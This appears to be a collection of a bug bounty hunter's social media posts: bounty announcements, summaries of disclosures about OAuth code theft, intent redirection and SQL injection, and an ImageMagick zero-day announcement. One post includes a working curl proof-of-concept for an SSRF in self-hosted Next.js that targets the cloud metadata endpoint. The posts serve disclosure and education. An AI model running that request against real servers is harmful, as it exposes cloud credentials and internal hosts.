Tobi Weißhaar

Got a $12,000 bounty on @Hacker0x01! hackerone.com/kun_19 #TogetherWeHitHarder My highest single bounty ever 🙂 And…it was a mobile bug 📱 Unfortunately can‘t share any details, but Android permissions used across multiple apps of the company can be an issue ;)

@rootxharsh @HacktronAI What I observed is that CloudFront, Akamai, etc. are most of the time used and are blocking the suspicious payload

Last week's Next.js stable release patches multiple vulnerabilities found by @HacktronAI CVE-2026-44578: SSRF via WebSocket upgrade. It is the most impactful of all, it lets an attacker read internal hosts such as cloud metadata endpoints on self-hosted next.js applications. curl -H "Connection: Upgrade" -H "Upgrade: websocket" \ -H "Sec-WebSocket-Version: 13" \ -H "Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==" \ "http://target:3000" \ --request-target "http://169.254.169.254/latest/meta-data/"

🚨 ZERODAY: ImageMagick 🚨 Our autonomous pentester pwn.ai just dropped multiple zeroday chains in ImageMagick that achieve RCE and File Leak from a single .jpg or .pdf file, bypassing EVERY security policy (Default, Limited, AND Secure). 🤯 💥 Affects Ubuntu, Debian, WordPress & millions of servers globally. Happy Monday and Happy Hunting! 🥰 pwn.ai/blog/imagemagi…

Took a long break from bug bounty hunting but feels good to know muscle memory is still there 😅 Got a $800 bounty on @Hacker0x01! hackerone.com/kun_19 #TogetherWeHitHarder

Thrilled to announce the start of a new chapter @codewhitesec 🙂 Thank you for the welcome package 🙃

..to exploit it in 2025 I recommend blog.includesecurity.com/2025/04/cross-…

Yay, I was awarded a $900 bounty on @Hacker0x01! hackerone.com/kun_19 #TogetherWeHitHarder #bugBounty Cross-Site attacks become very rare with the latest browser security mechanisms but found a cross-site web socket hijacking vulnerability recently. If you want to know how..

First experience with the @SamsungMobile Bug Bounty Program. Takes a looong time to get rewarded and the reward was not as expected…but anyways what stays is a CVE for Samsung (Browser App) 😅 Thanks @_m1tZ for the collab!#bugBounty #hacking nvd.nist.gov/vuln/detail/CV…

🪲 Bug bounty disclosure: account vulnerability Here's how @_kun_19 highlighted a security gap in Shopify Collabs 🧵

...the configured redirect uri in the Facebook Dev Portal. On this way I showed how I'm able to steal the Oauth authorization code, which also allows me to log into the victim's account

...I created an own Facebook OAuth Client in Facebook's Developer Portal and started the activity with the appropriate OAuth config. The victim is now prompted to log in via Facebook and after doing that, the OAuth victim's authorization code is sent to my web server due to...

Got a $500 bounty on @Hacker0x01! hackerone.com/kun_19 #TogetherWeHitHarder Exploited an Intent Redirection in a mobile app. It's a kind of equivalent to an Open Redirect in web apps. 🧵

@bogbounty @Hacker0x01 had the source code 🤷🏻‍♂️😄 So no real advice sorry😅

Got a $6,000 bounty on @Hacker0x01! Hmm…seems SQL injections are still a thing 🙃 hackerone.com/kun_19 #TogetherWeHitHarder

@AatankBadb16659 @Hacker0x01 I had the target‘s source code and just saw it in the code so it was no black box for me 😅

@_kun_19 @Hacker0x01 How you identify-- sqli .... Like adding '," etc

Shopify disclosed a bug submitted by @_kun_19: hackerone.com/reports/1679734 - Bounty: $800 #hackerone #bugbounty

One of my reports to @ShopifyEng was disclosed. ATO with some preconditions that must be met, but maybe interesting for you 😉 #BugBounty @Hacker0x01 hackerone.com/reports/1679734

And now it‘s weekend 😫